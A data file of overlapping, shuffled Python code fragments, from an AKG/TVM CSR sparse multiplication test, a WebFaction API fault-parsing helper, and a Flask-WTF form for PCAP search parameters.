row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs,", "col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name)", "shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False,", "ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i)", "dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with", "ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape,", "= random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2))", "akg import tvm from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random", "raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output,", "sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense,", "import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense,", "atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res:", "* ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col]))", "attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data,", "= get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) ==", "import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape", "= get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res", "weight must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape =", "= utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1)", "def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\":", "outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1,", "ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense,", "output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2],", "= np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol,", "numpy as np import scipy.sparse import akg from akg import tvm from akg", "= ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end -", "< broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def", "assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have", "from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import", "import akg from akg import tvm from akg import topi from tests.common.base import", "[dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype,", "shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} #", "- 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand", "[i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get()", "= mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array(", "ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val", "len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output =", "pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val", "dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect", "name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1],", "tvm from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian", "name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1)", "sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape)", "attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1,", "dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape", "row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def", "get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape)", "random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return", "assert dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\" num_rows", "= get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) <", "= ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope():", "ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos,", "get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports", "len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert", "== 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod,", "dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape)", "attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape,", "= mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise", "with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output,", "else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name", "col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] =", "as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create", "ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output,", "poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs", "mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source())", "start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col =", "col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect,", "gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr',", "expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol =", "and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create()", "shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod =", "csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse", "output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol)", "dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul,", "expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if", "from akg import tvm from akg import topi from tests.common.base import get_rtol_atol from", "must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape)", "start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end", "if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2]", "get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else", "args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list,", "akg from akg import tvm from akg import topi from tests.common.base import get_rtol_atol", "print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data," ]
[ "exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return", "return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try:", "isinstance(message, list): if not message: return None return message[0] return None class WebFactionFault(Exception):", "def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly elegant", "underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None", "not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message:", "type to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None", "exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX)", "exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message)", "__init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type =", "= ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0] return", "if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) *", "import ast EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This", "EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly", "a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not", "= underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type =", "message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type,", "that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None", "This is horribly hacky, but there's not a particularly elegant # way to", "= \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky,", "-1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message,", "message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0]", "exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def", "if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not", "None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message =", "the exception type to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX):", "horribly hacky, but there's not a particularly elegant # way to go from", "\"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but", "try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except", "to go from the exception type to a string representing that # exception.", "from the exception type to a string representing that # exception. if not", "hacky, but there's not a particularly elegant # way to go from the", "# exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return", "exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return", "not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1]", "self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message =", "return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault =", "return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message", "_parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly elegant #", "particularly elegant # way to go from the exception type to a string", "_parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if", "if isinstance(message, list): if not message: return None return message[0] return None class", "= \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a", "return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message =", "to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if", "is horribly hacky, but there's not a particularly elegant # way to go", "if not message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self,", "EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not", "# This is horribly hacky, but there's not a particularly elegant # way", "def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type", "a particularly elegant # way to go from the exception type to a", "but there's not a particularly elegant # way to go from the exception", "underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type)", "return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None", "message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault", "representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return", "not a particularly elegant # way to go from the exception type to", "def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list):", "class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':',", "return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message):", "exception type to a string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return", "if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not", "None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return", "self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message", "exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError:", "None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying", "not message: return None return message[0] return None class WebFactionFault(Exception): def __init__(self, underlying):", "elegant # way to go from the exception type to a string representing", "string representing that # exception. if not exc_type.startswith(EXCEPTION_TYPE_PREFIX): return None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX):", "\"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's not a particularly", "there's not a particularly elegant # way to go from the exception type", "return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None", "None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if not exc_message: return None message", "ast EXCEPTION_TYPE_PREFIX = \"<class 'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is", "= _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message = None", "# way to go from the exception type to a string representing that", "exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type", "WebFactionFault(Exception): def __init__(self, underlying): self.underlying_fault = underlying try: exc_type, exc_message = underlying.faultString.split(':', 1)", "None if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX): return None return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1] def _parse_exc_message(exc_message): if", "1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message) except ValueError: self.exception_type = None self.exception_message", "not exc_message: return None message = ast.literal_eval(exc_message) if isinstance(message, list): if not message:", "* -1] def _parse_exc_message(exc_message): if not exc_message: return None message = ast.literal_eval(exc_message) if", "underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message = _parse_exc_message(exc_message)", "ast.literal_eval(exc_message) if isinstance(message, list): if not message: return None return message[0] return None", "= underlying try: exc_type, exc_message = underlying.faultString.split(':', 1) self.exception_type = _parse_exc_type(exc_type) self.exception_message =", "list): if not message: return None return message[0] return None class WebFactionFault(Exception): def", "'webfaction_api.exceptions.\" EXCEPTION_TYPE_SUFFIX = \"'>\" def _parse_exc_type(exc_type): # This is horribly hacky, but there's", "way to go from the exception type to a string representing that #", "go from the exception type to a string representing that # exception. if" ]
[ "validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device", "Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time,", "\"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)])", "session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of", "numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the", "search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format:", "Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit = SubmitField('Submit')", "IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The", "in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID',", "StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must", "ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time =", "= \"The PCAP ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(),", "validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time = StringField('Search", "their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP", "of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have", "ID must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id =", "main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message =", "(StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" #", "from flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import", "class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only", "Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit =", "consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message", "wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time =", "\"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding validators class", "corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID", "IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")]) device_name", "= \"The Session ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(),", "flask_wtf import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired,", "must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search", "StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")]) submit", "Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only", "wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in", "FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp", "the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message", "= IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")])", "ID', validators=[InputRequired(message = \"The PCAP ID must only consist of numbers\")]) device_name =", "rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP", "Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist", "import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the", "only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time", "consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must", "PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist", "InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page", "numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The", "from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered", "= IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")])", "with their corresponding validators class PcapForm(FlaskForm): pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The", "SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form", "IntegerField('Session ID', validators=[InputRequired(message = \"The Session ID must only consist of numbers\")]) search_time", "The form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id", "ID must only consist of numbers\")]) search_time = StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The", "= \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their corresponding validators", "Length, Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with", "import FlaskForm from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length,", "Regexp valid_search_time = \"^(19[0-9][0-9]|20[0-9][0-9])(\\/)(0[1-9]|1[0-2])(\\/)(0[1-9]|1[0-9]|2[0-9]|3[0-1])\\+(0[0-9]|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$\" # The form rendered in the main-page with their", "form rendered in the main-page with their corresponding validators class PcapForm(FlaskForm): pcap_id =", "pcap_id = IntegerField('PCAP ID', validators=[InputRequired(message = \"The PCAP ID must only consist of", "= StringField('Search Time',validators=[InputRequired(), Length(max=30), Regexp(valid_search_time, message=\"The Search Time must have the format: yyyy/mm/dd+hr:min:sec\")])", "device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message = \"The Session", "must only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session", "from wtforms import (StringField, IntegerField, SubmitField) from wtforms.validators import InputRequired, Length, Regexp valid_search_time", "of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID', validators=[InputRequired(message =", "only consist of numbers\")]) device_name = StringField('Device Name',validators=[InputRequired(), Length(max=20)]) session_id = IntegerField('Session ID',", "valid_search_time = 